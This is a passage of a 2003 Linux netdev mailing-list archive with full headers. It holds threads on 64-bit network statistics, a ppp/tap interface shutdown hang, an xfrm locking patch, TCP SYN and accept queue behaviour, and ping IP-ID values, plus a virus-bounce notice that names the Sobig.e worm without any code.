(localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h65Lf0Kk002164; Sat, 5 Jul 2003 14:41:03 -0700 Message-ID: <3F0745EC.1060204@candelatech.com> Date: Sat, 05 Jul 2003 14:41:00 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Jeff Garzik CC: Jeff Sipek , Bernd Eckenfels , linux-kernel@vger.kernel.org, Andrew Morton , Dave Jones , Linus Torvalds , netdev@oss.sgi.com Subject: Re: [PATCH - RFC] [1/5] 64-bit network statistics - generic net References: <200307051637.52252.jeffpc@optonline.net> <3F0737D1.5090109@pobox.com> In-Reply-To: <3F0737D1.5090109@pobox.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3783 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev Jeff Garzik wrote: > The net stats are already unsigned long internally. > > 64-bit case is handled quite nicely today, thanks :) > > I'm such a 64-bit bigot that "buy a 64-bit computer" is a solution I > commonly suggest, and it seems to fit well here, too. > > Jeff, wondering if Intel will bother to compete w/ Athlon64 Untill the net-stats are 64-bit on 32-bit systems, we will need some way to know if they have wrapped or not when reading from nettool and getting 64-bit numbers. I guess what I really mean to say is that, if nettool is returning 64-bit values, we need to know which ones are obtained from 32-bit counters. 32 -> 64 bit mapping will require wrap handling on low 32-bits, but 64 -> 64 bit mapping will require wrapping about 4-billion times less often :) Perhaps a precision field is also needed for backwards/forwards compatability, and perhaps a nettool version field as well to also help with backwards/forwards compat. Ben > > > -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From romieu@fr.zoreil.com Sat Jul 5 16:45:41 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 05 Jul 2003 16:45:45 -0700 (PDT) Received: from fr.zoreil.com (electric-eye.fr.zoreil.com [213.41.134.224]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h65Njd2x001206 for ; Sat, 5 Jul 2003 16:45:40 -0700 Received: from electric-eye.fr.zoreil.com (localhost.localdomain [127.0.0.1]) by fr.zoreil.com (8.12.8/8.12.1) with ESMTP id h65NiPfI011755; Sun, 6 Jul 2003 01:44:25 +0200 Received: (from romieu@localhost) by electric-eye.fr.zoreil.com (8.12.8/8.12.1) id h65NiOmB011754; Sun, 6 Jul 2003 01:44:24 +0200 Date: Sun, 6 Jul 2003 01:44:23 +0200 From: Francois Romieu To: Jeff Sipek Cc: Jeff Garzik , Bernd Eckenfels , linux-kernel@vger.kernel.org, Andrew Morton , Dave Jones , Linus Torvalds , netdev@oss.sgi.com Subject: Re: [PATCH - RFC] [1/5] 64-bit network statistics - generic net Message-ID: <20030706014423.A11165@electric-eye.fr.zoreil.com> References: <200307051700.32533.jeffpc@optonline.net> <20030705235131.A10511@electric-eye.fr.zoreil.com> <200307051839.50327.jeffpc@optonline.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <200307051839.50327.jeffpc@optonline.net>; from jeffpc@optonline.net on Sat, Jul 05, 2003 at 06:39:41PM -0400 X-archive-position: 3784 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: romieu@fr.zoreil.com Precedence: bulk X-list: netdev Jeff Sipek : [...] > P.S. I just looked up the cheapest gigabit copper I could find in 10 seconds, > and I found: D-Link DGE-500T for $36.27 this is just 4 times the price of the > cheapest fast ethernet I found on the same site (cdw.com - they are not the > cheapest, but I like them) Please google around on the topic "nanog/gigabit/routing/linux" and read netdev archive again. It isn't _that_ simple. -- Ueimor From alan@lxorguk.ukuu.org.uk Sun Jul 6 00:30:35 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 06 Jul 2003 00:31:05 -0700 (PDT) Received: from lxorguk.ukuu.org.uk (pc2-cwma1-4-cust86.swan.cable.ntl.com [213.105.254.86]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h667UV2x004845 for ; Sun, 6 Jul 2003 00:30:34 -0700 Received: from dhcp22.swansea.linux.org.uk (dhcp22.swansea.linux.org.uk [127.0.0.1]) by lxorguk.ukuu.org.uk (8.12.8/8.12.5) with ESMTP id h667RIKd000765; Sun, 6 Jul 2003 08:27:18 +0100 Received: (from alan@localhost) by dhcp22.swansea.linux.org.uk (8.12.8/8.12.8/Submit) id h667REEW000763; Sun, 6 Jul 2003 08:27:14 +0100 X-Authentication-Warning: dhcp22.swansea.linux.org.uk: alan set sender to alan@lxorguk.ukuu.org.uk using -f Subject: Re: [PATCH - RFC] [1/5] 64-bit network statistics - generic net From: Alan Cox To: Ben Greear Cc: Jeff Garzik , Jeff Sipek , Bernd Eckenfels , Linux Kernel Mailing List , Andrew Morton , Dave Jones , Linus Torvalds , netdev@oss.sgi.com In-Reply-To: <3F0745EC.1060204@candelatech.com> References: <200307051637.52252.jeffpc@optonline.net> <3F0737D1.5090109@pobox.com> <3F0745EC.1060204@candelatech.com> Content-Type: text/plain Content-Transfer-Encoding: 7bit Organization: Message-Id: <1057476433.700.2.camel@dhcp22.swansea.linux.org.uk> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.2.2 (1.2.2-5) Date: 06 Jul 2003 08:27:14 +0100 X-archive-position: 3786 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: alan@lxorguk.ukuu.org.uk Precedence: bulk X-list: netdev On Sad, 2003-07-05 at 22:41, Ben Greear wrote: > Untill the net-stats are 64-bit on 32-bit systems, we will need some > way to know if they have wrapped or not when reading from nettool > and getting 64-bit numbers. iptables Collecting the data on a need to know basis 8) From rol@as2917.net Sun Jul 6 02:43:42 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 06 Jul 2003 02:43:46 -0700 (PDT) Received: from tag.witbe.net (IDENT:root@tag.witbe.net [81.88.96.48]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h669he2x009514 for ; Sun, 6 Jul 2003 02:43:41 -0700 Received: from fifi (APuteaux-102-1-1-241.w193-251.abo.wanadoo.fr [193.251.27.241]) by tag.witbe.net (8.11.0/8.11.0) with ESMTP id h669hVp08325; Sun, 6 Jul 2003 09:43:31 GMT From: "Paul Rolland" To: "'Chris Friesen'" , Cc: , , , Subject: Re: [BUG]: problem when shutting down ppp connection since 2.5.70 Date: Sun, 6 Jul 2003 11:43:30 +0200 Message-ID: <008201c343a3$0f9f8a70$2101a8c0@witbe> MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.4510 In-Reply-To: <3F03BC55.6050506@nortelnetworks.com> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal X-archive-position: 3787 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: rol@as2917.net Precedence: bulk X-list: netdev Hello, > Well, I've upgraded to the latest 2.5.74 kernel and pppd > version 2.4.2b3 > (still using the rp-pppoe userspace software though). > > Per Stephen's suggestion I also tried removing the ip address and > bringing down the ppp link before shuttind down the adsl connection. > > Makes no difference. > To complete on this topic : I've got the problem since 2.5.70, when netdev_wait_allrefs has been introduced in net/core/dev.c I have the same behavior using vtund, configured to create a tap0 interface. At shutdown time, the interface refuses to get freed and I'm stuck. Having vtund started at boot time (within the /etc/rc.d/... stuff) or later doesn't make any difference. Shutting down the interface before stopping the application or halting the machine doesn't make any difference either. The other problem is that the current implementation of netdev_wait_allrefs makes that if you kill an application that is using a device not correctly counted, you lock the console you are working on. e.g., killing vtund will create a printk(... unregister_netdevice...), and the console cannot be used anymore as long as the counter hasn't reached 0 and the device is freed... Paul From jmorris@intercode.com.au Sun Jul 6 05:43:30 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 06 Jul 2003 05:43:36 -0700 (PDT) Received: from blackbird.intercode.com.au (IDENT:Y6eLAoDcGUlJvIAdPB8S+8iU7wcEA3WC@blackbird.intercode.com.au [203.32.101.10]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h66ChQ2x016252 for ; Sun, 6 Jul 2003 05:43:28 -0700 Received: from excalibur.intercode.com.au (excalibur.intercode.com.au [203.32.101.12]) by blackbird.intercode.com.au (8.11.6p2/8.9.3) with ESMTP id h66Cger08253; Sun, 6 Jul 2003 22:42:41 +1000 Date: Sun, 6 Jul 2003 22:42:40 +1000 (EST) From: James Morris To: "David S. Miller" cc: kuznet@ms2.inr.ac.ru, Subject: [PATCH] Don't call request_module() under spinlock in xfrm_get_type() Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3788 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jmorris@intercode.com.au Precedence: bulk X-list: netdev This patch fixes a problem where request_module() was being called under the lock taken in xfrm_policy_get_afinfo(). An alternative fix would be to refcount xfrm_policy_afinfo structs, either explicitly or via a module owner field, although it seems like overkill in this case. - James -- James Morris diff -urN -X dontdiff bk.orig/net/xfrm/xfrm_policy.c bk.w1/net/xfrm/xfrm_policy.c --- bk.orig/net/xfrm/xfrm_policy.c 2003-07-06 02:59:18.000000000 +1000 +++ bk.w1/net/xfrm/xfrm_policy.c 2003-07-06 22:32:47.230524746 +1000 @@ -80,22 +80,24 @@ struct xfrm_type *xfrm_get_type(u8 proto, unsigned short family) { - struct xfrm_policy_afinfo *afinfo = xfrm_policy_get_afinfo(family); + struct xfrm_policy_afinfo *afinfo; struct xfrm_type_map *typemap; struct xfrm_type *type; int modload_attempted = 0; +retry: + afinfo = xfrm_policy_get_afinfo(family); if (unlikely(afinfo == NULL)) return NULL; typemap = afinfo->type_map; -retry: read_lock(&typemap->lock); type = typemap->map[proto]; if (unlikely(type && !try_module_get(type->owner))) type = NULL; read_unlock(&typemap->lock); if (!type && !modload_attempted) { + xfrm_policy_put_afinfo(afinfo); request_module("xfrm-type-%d-%d", (int) family, (int) proto); modload_attempted = 1; From niv@us.ibm.com Sun Jul 6 13:27:47 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 06 Jul 2003 13:27:54 -0700 (PDT) Received: from e32.co.us.ibm.com (e32.co.us.ibm.com [32.97.110.130]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h66KRd2x020879 for ; Sun, 6 Jul 2003 13:27:46 -0700 Received: from westrelay03.boulder.ibm.com (westrelay03.boulder.ibm.com [9.17.195.12]) by e32.co.us.ibm.com (8.12.9/8.12.2) with ESMTP id h66KRW8w286636; Sun, 6 Jul 2003 16:27:32 -0400 Received: from us.ibm.com (d03av03.boulder.ibm.com [9.17.193.83]) by westrelay03.boulder.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h66KRVcW131778; Sun, 6 Jul 2003 14:27:32 -0600 Message-ID: <3F08858E.8000907@us.ibm.com> Date: Sun, 06 Jul 2003 13:24:46 -0700 From: Nivedita Singhvi User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.2.1) Gecko/20021130 X-Accept-Language: en-us, en MIME-Version: 1.0 To: palbrecht@qwest.net CC: linux-kernel@vger.kernel.org, netdev Subject: Re: question about linux tcp request queue handling Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3789 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: niv@us.ibm.com Precedence: bulk X-list: netdev > Linux (2.4.18) places incoming connection requests into the syn_recd state > when the server's backlog queue is full. I thought they were supposed to be > discarded if the server's backlog is full, forcing the client to > subsequently retransmit the request after it times out. Why does linux put > the server side into the syn_recd state when its backlog is full? Do you have tcp_syncookies on? And are you exceeding the len as configured by tcp_max_syn_backlog? thanks, Nivedita [Please cc or post to netdev, like most networking folk, dont subscribe to lkml] From palbrecht@qwest.net Sun Jul 6 15:15:38 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 06 Jul 2003 15:15:53 -0700 (PDT) Received: from mpls-qmqp-02.inet.qwest.net (mpls-qmqp-02.inet.qwest.net [63.231.195.113]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h66MFb2x022394 for ; Sun, 6 Jul 2003 15:15:38 -0700 Received: (qmail 14687 invoked by uid 0); 6 Jul 2003 21:43:05 -0000 Received: from mpls-pop-14.inet.qwest.net (63.231.195.14) by mpls-qmqp-02.inet.qwest.net with QMQP; 6 Jul 2003 21:43:05 -0000 Received: from 0-1pool148-107.nas7.minneapolis1.mn.us.da.qwest.net (HELO oemcomputer) (67.4.148.107) by mpls-pop-14.inet.qwest.net with SMTP; 6 Jul 2003 22:15:36 -0000 Date: Sun, 6 Jul 2003 17:12:19 -0700 Message-ID: <001a01c3441c$6fe111a0$6801a8c0@oemcomputer> From: "Paul Albrecht" To: "Nivedita Singhvi" Cc: linux-kernel@vger.kernel.org, "netdev" References: <3F08858E.8000907@us.ibm.com> Subject: Re: question about linux tcp request queue handling MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2615.200 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 X-archive-position: 3790 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: palbrecht@qwest.net Precedence: bulk X-list: netdev Nivedita writes: > > Do you have tcp_syncookies on? > syncookies = 0. > >And are you exceeding the len as configured by tcp_max_syn_backlog? > max_syn_backlog = 256. My server program sets its backlog to one and pauses ninety seconds before accepting connections. Within that ninety second interval, I start three client programs that do an active open to my server. I expect one of connections to get discarded when the server's connection backlog limit is exceeded. From niv@us.ibm.com Sun Jul 6 17:03:02 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 06 Jul 2003 17:03:40 -0700 (PDT) Received: from e35.co.us.ibm.com (e35.co.us.ibm.com [32.97.110.133]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6702L2x023217 for ; Sun, 6 Jul 2003 17:03:02 -0700 Received: from westrelay01.boulder.ibm.com (westrelay01.boulder.ibm.com [9.17.195.10]) by e35.co.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6702Gxe248456; Sun, 6 Jul 2003 20:02:16 -0400 Received: from us.ibm.com (d03av03.boulder.ibm.com [9.17.193.83]) by westrelay01.boulder.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6702Ecu144700; Sun, 6 Jul 2003 18:02:15 -0600 Message-ID: <3F08B7E2.7040208@us.ibm.com> Date: Sun, 06 Jul 2003 16:59:30 -0700 From: Nivedita Singhvi User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.2.1) Gecko/20021130 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Paul Albrecht CC: linux-kernel@vger.kernel.org, netdev Subject: Re: question about linux tcp request queue handling References: <3F08858E.8000907@us.ibm.com> <001a01c3441c$6fe111a0$6801a8c0@oemcomputer> In-Reply-To: <001a01c3441c$6fe111a0$6801a8c0@oemcomputer> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3791 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: niv@us.ibm.com Precedence: bulk X-list: netdev Paul Albrecht wrote: > My server program sets its backlog to one and pauses ninety seconds before > accepting connections. Within that ninety second interval, I start three > client programs that do an active open to my server. I expect one of > connections to get discarded when the server's connection backlog limit is > exceeded. We actually have two queues - the syn queue and the socket acccept queue. We move the connection request from the syn queue to the accept queue of the socket once the 3 way handshake is complete - i.e. once the state is ESTABLISHED. If the syn queue is full, requests will get dropped and the socket will not change state. When you set a the backlog to 1 in the listen call, what is being capped is the accept queue. So I would expect your server to allow only one of those requests in the accept queue, and the kernel will drop the other two requests. Actually, details, but we also apply some other conditions before we actually drop the connection request - we try not to be so harsh if the syn queue is still fairly empty.. Think thats so, at any rate :). Nivedita From palbrecht@qwest.net Sun Jul 6 21:24:01 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 06 Jul 2003 21:24:13 -0700 (PDT) Received: from mpls-qmqp-03.inet.qwest.net (mpls-qmqp-03.inet.qwest.net [63.231.195.114]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h674O02x031556 for ; Sun, 6 Jul 2003 21:24:00 -0700 Received: (qmail 25532 invoked by uid 0); 7 Jul 2003 04:16:44 -0000 Received: from mpls-pop-11.inet.qwest.net (63.231.195.11) by mpls-qmqp-03.inet.qwest.net with QMQP; 7 Jul 2003 04:16:44 -0000 Received: from 0-1pool150-126.nas8.minneapolis1.mn.us.da.qwest.net (HELO oemcomputer) (67.4.150.126) by mpls-pop-11.inet.qwest.net with SMTP; 7 Jul 2003 04:23:59 -0000 Date: Sun, 6 Jul 2003 23:20:42 -0700 Message-ID: <000d01c3444f$e6439600$6801a8c0@oemcomputer> From: "Paul Albrecht" To: "Nivedita Singhvi" Cc: linux-kernel@vger.kernel.org, "netdev" References: <3F08858E.8000907@us.ibm.com> <001a01c3441c$6fe111a0$6801a8c0@oemcomputer> <3F08B7E2.7040208@us.ibm.com> Subject: Re: question about linux tcp request queue handling MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2615.200 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 X-archive-position: 3792 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: palbrecht@qwest.net Precedence: bulk X-list: netdev Nivedita Singhvi writes: > > When you set a the backlog to 1 in the listen call, what is > being capped is the accept queue. So I would expect your > server to allow only one of those requests in the accept > queue, and the kernel will drop the other two requests. > What you get when you set backlog to one is operating system dependent. Tracing the flows with tcpdump, I get two clean handshakes so presumeably, for linux, one means two. The third connection request *isn't* dropped; according to netstat, it's placed in the syn_recd state. I thought berkeley-derived implementations followed the rule that if there is no room on the backlog queue for the new connection, tcp ignored the the received syn. > > Actually, details, but we also apply some other conditions > before we actually drop the connection request - we try not to be > so harsh if the syn queue is still fairly empty.. > Irrespective of whatever conditions linux applies, how can the connection enter the syn_recd state if the backlog limit would be exceeded? What's the client supposed to do with the syn/ack from the server? What's the server supposed to do with the ack it get's back from the client? From niv@us.ibm.com Sun Jul 6 22:54:49 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 06 Jul 2003 22:55:25 -0700 (PDT) Received: from e32.co.us.ibm.com (e32.co.us.ibm.com [32.97.110.130]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h675s22x002118 for ; Sun, 6 Jul 2003 22:54:49 -0700 Received: from westrelay05.boulder.ibm.com (westrelay05.boulder.ibm.com [9.17.193.33]) by e32.co.us.ibm.com (8.12.9/8.12.2) with ESMTP id h675rv8w189942; Mon, 7 Jul 2003 01:53:57 -0400 Received: from us.ibm.com (d03av03.boulder.ibm.com [9.17.193.83]) by westrelay05.boulder.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h675rtTl079362; Sun, 6 Jul 2003 23:53:56 -0600 Message-ID: <3F090A4F.10004@us.ibm.com> Date: Sun, 06 Jul 2003 22:51:11 -0700 From: Nivedita Singhvi User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.2.1) Gecko/20021130 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Paul Albrecht CC: linux-kernel@vger.kernel.org, netdev Subject: Re: question about linux tcp request queue handling References: <3F08858E.8000907@us.ibm.com> <001a01c3441c$6fe111a0$6801a8c0@oemcomputer> <3F08B7E2.7040208@us.ibm.com> <000d01c3444f$e6439600$6801a8c0@oemcomputer> In-Reply-To: <000d01c3444f$e6439600$6801a8c0@oemcomputer> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3793 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: niv@us.ibm.com Precedence: bulk X-list: netdev Paul Albrecht wrote: >>When you set a the backlog to 1 in the listen call, what is >>being capped is the accept queue. So I would expect your >>server to allow only one of those requests in the accept >>queue, and the kernel will drop the other two requests. > What you get when you set backlog to one is operating system dependent. You asked about Linux 2.4.18, and I was speaking strictly for it. This is after all linux-netdev :). > Tracing the flows with tcpdump, I get two clean handshakes so presumeably, > for linux, one means two. The third connection request *isn't* dropped; Again, youre limiting the number of connnection requests that are allowed to wait in the *accept* queue, where we move to once we're ESTABLISHED. You arent limiting a request sitting in the SYN queue. > according to netstat, it's placed in the syn_recd state. I thought > berkeley-derived implementations followed the rule that if there is no room > on the backlog queue for the new connection, tcp ignored the the received > syn. >>Actually, details, but we also apply some other conditions >>before we actually drop the connection request - we try not to be >>so harsh if the syn queue is still fairly empty.. >> > > > Irrespective of whatever conditions linux applies, how can the connection > enter the syn_recd state if the backlog limit would be exceeded? What's the > client supposed to do with the syn/ack from the server? What's the server > supposed to do with the ack it get's back from the client? Er, complete the 3 way handshake? If the client gets the syn/ack, it should send a SYN in response, and move to ESTABLISHED state. If the server gets an ack back from the client, we process the ack. Our processing involves moving the request from the syn queue to the accept queue. Should the accept queue be full (which could occur anytime - eg it could have occurred *after* the server recvd this SYN) we would drop the request. Should the client then send data, it would get a RST, letting it know our side (srvr) has had to throw the connection away. Its quite possible that the accept queue clears and a request can be moved from the SYN queue to the accept queue in the interval of the handshake being completed (?) If we get a SYN, it doesn't seem unreasonable that we enter SYN_RCVD state :). thanks, Nivedita From niv@us.ibm.com Sun Jul 6 23:02:22 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 06 Jul 2003 23:02:25 -0700 (PDT) Received: from e34.co.us.ibm.com (e34.co.us.ibm.com [32.97.110.132]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6761w2x002503 for ; Sun, 6 Jul 2003 23:02:21 -0700 Received: from westrelay05.boulder.ibm.com (westrelay05.boulder.ibm.com [9.17.193.33]) by e34.co.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6761pDG208178; Mon, 7 Jul 2003 02:01:51 -0400 Received: from us.ibm.com (d03av03.boulder.ibm.com [9.17.193.83]) by westrelay05.boulder.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6761nTl054060; Mon, 7 Jul 2003 00:01:49 -0600 Message-ID: <3F090C28.4080405@us.ibm.com> Date: Sun, 06 Jul 2003 22:59:04 -0700 From: Nivedita Singhvi User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.2.1) Gecko/20021130 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Nivedita Singhvi CC: Paul Albrecht , linux-kernel@vger.kernel.org, netdev Subject: Re: question about linux tcp request queue handling References: <3F08858E.8000907@us.ibm.com> <001a01c3441c$6fe111a0$6801a8c0@oemcomputer> <3F08B7E2.7040208@us.ibm.com> <000d01c3444f$e6439600$6801a8c0@oemcomputer> <3F090A4F.10004@us.ibm.com> In-Reply-To: <3F090A4F.10004@us.ibm.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3794 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: niv@us.ibm.com Precedence: bulk X-list: netdev Nivedita Singhvi wrote: > Er, complete the 3 way handshake? If the client gets the syn/ack, it > should send a SYN in response, and move to ESTABLISHED state. If the ~~~ my bad, sorry, that should be ACK, of course... thanks, Nivedita From MAILER-DAEMON@oss.sgi.com Mon Jul 7 01:08:17 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 01:08:25 -0700 (PDT) Received: from ns1.ryston.cz (ns1.ryston.cz [62.77.73.11]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6788F2x013419 for ; Mon, 7 Jul 2003 01:08:17 -0700 Received: (qmail 10210 invoked by uid 504); 7 Jul 2003 08:08:09 -0000 Date: 7 Jul 2003 08:08:09 -0000 From: "System Anti-Virus Administrator" To: netdev@oss.sgi.com Subject: virus found in sent message "Re: Movie" Message-ID: X-Tnz-Problem-Type: 40 MIME-Version: 1.0 Content-type: text/plain X-archive-position: 3795 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: postmaster@ryston.cz Precedence: bulk X-list: netdev Attention: netdev@oss.sgi.com A virus was found in an Email message you sent. This Email scanner intercepted it and stopped the entire message reaching its destination. The virus was reported to be: I-Worm.Sobig.e Please update your virus scanner or contact your IT support personnel as soon as possible as you have a virus on your system. Your message was sent with the following envelope: MAIL FROM: netdev@oss.sgi.com RCPT TO: petr@ryston.cz ... and with the following headers: --- MAILFROM: netdev@oss.sgi.com Received: from unknown (HELO ROCKYLU) (61.144.149.99) by ns1.ryston.cz with SMTP; 7 Jul 2003 08:07:47 -0000 From: To: Subject: Re: Movie Date: Mon, 7 Jul 2003 16:06:59 +0800 Importance: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MSMail-Priority: Normal X-Priority: 3 (Normal) MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="CSmtpMsgPart123X456_000_0191A495" --- From kohei@cysols.com Mon Jul 7 04:37:24 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 04:37:28 -0700 (PDT) Received: from geto.cysol.co.jp (geto.cysol.co.jp [210.233.3.227]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h67BbN2x024433 for ; Mon, 7 Jul 2003 04:37:24 -0700 Received: from cysols.com (agari2.priv.cysol.co.jp [192.168.0.249]) by geto.cysol.co.jp (8.12.9/3.7W) with ESMTP id h67BbKwQ007480 for ; Mon, 7 Jul 2003 20:37:21 +0900 (JST) Message-ID: <3F095B7B.5090203@cysols.com> Date: Mon, 07 Jul 2003 20:37:31 +0900 From: Kohei OHTA User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.4) Gecko/20030624 Netscape/7.1 (ax) X-Accept-Language: ja MIME-Version: 1.0 To: netdev@oss.sgi.com Subject: IP-ID field of ICMP echo request X-Enigmail-Version: 0.76.1.0 X-Enigmail-Supports: pgp-inline, pgp-mime Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3796 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kohei@cysols.com Precedence: bulk X-list: netdev Hi folks, I found a strange packet, which is generated by ping of Linux. It is observed ID field of IP header in ping packet (Echo request) is always 0. I confirmed this on kernel 2.4.18 and 2.4.21. My colleague also confirmed this is fixed in kernel 2.5.74. I hope this is fixed in next next 2.4.x release. I am sorry if this had been fixed already. #I am not member of this ML. #If you need any further information, please CC me. Regards, Kohei. From solt@dns.toxicfilms.tv Mon Jul 7 05:29:35 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 05:29:46 -0700 (PDT) Received: from dns.toxicfilms.tv (postfix@dns.toxicfilms.tv [150.254.37.24]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h67CTW2x026104 for ; Mon, 7 Jul 2003 05:29:35 -0700 Received: by dns.toxicfilms.tv (Postfix, from userid 1000) id 60602309B3F; Mon, 7 Jul 2003 14:29:28 +0200 (CEST) Received: from localhost (localhost [127.0.0.1]) by dns.toxicfilms.tv (Postfix) with ESMTP id 5F9A2187055E; Mon, 7 Jul 2003 14:29:28 +0200 (CEST) Date: Mon, 7 Jul 2003 14:29:28 +0200 (CEST) From: Maciej Soltysiak To: Kohei OHTA Cc: netdev@oss.sgi.com Subject: Re: IP-ID field of ICMP echo request In-Reply-To: <3F095B7B.5090203@cysols.com> Message-ID: References: <3F095B7B.5090203@cysols.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3797 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: solt@dns.toxicfilms.tv Precedence: bulk X-list: netdev > I found a strange packet, which is generated by ping of Linux. > It is observed ID field of IP header in ping packet (Echo request) is always 0. > > I confirmed this on kernel 2.4.18 and 2.4.21. > My colleague also confirmed this is fixed in kernel 2.5.74. > > I hope this is fixed in next next 2.4.x release. RFC 792 says: ... Identifier If code = 0, an identifier to aid in matching echos and replies, may be zero. ... I guess it is okay to have 0 as IPID. Regards, Maciej From yoshfuji@linux-ipv6.org Mon Jul 7 05:38:29 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 07 Jul 2003 05:38:40 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h67CcR2x026542 for ; Mon, 7 Jul 